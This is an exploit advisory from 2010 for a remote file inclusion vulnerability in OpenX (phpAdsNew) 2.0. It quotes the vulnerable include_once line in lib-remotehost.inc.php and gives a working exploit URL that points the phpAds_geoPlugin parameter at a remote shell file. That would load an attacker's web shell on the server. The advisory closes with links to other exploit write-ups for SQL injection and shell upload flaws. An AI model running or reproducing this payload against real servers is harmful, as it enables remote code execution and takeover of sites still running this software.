OpenX (phpAdsNew) Remote File inclusion Vulnerability

=====================================================
OpenX (phpAdsNew) Remote File inclusion Vulnerability
=====================================================
# Exploit Title: OpenX (phpAdsNew) Remote File inclusion Vulnerability
# Date: 2010/07/20
# Author: Mhiman HNc
# Script url:
http://www.opensourcescripts.com/dir/PHP/Ad_Management/phpadsnew_11.html
# download Script:
http://sourceforge.net/projects/phpadsnew/files/Current%20Release/Openads%202.0.11-pr1/Openads-2.0.11-pr1.zip/download
# Version:2.0
# Tested on: Windows
:::::::::::::::::::::::::
=================Exploit=================

-=[ vuln c0de ]=-
include_once ($phpAds_geoPlugin);
/libraries/lib-remotehost.inc.php
Line:109

----exploit----

http://
{localhost}/{path}/libraries/lib-remotehost.inc.php?phpAds_geoPlugin==shell.txt?

» Joomla Component com_dms Remote SQL injection vulnerability - (category_id)
» WordPress Editor Monkey suffers from a remote shell upload vulnerability
» Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability
» Uber Uploader <- File Upload Vulnerability
» w2box Uploader <- File Upload Vulnerability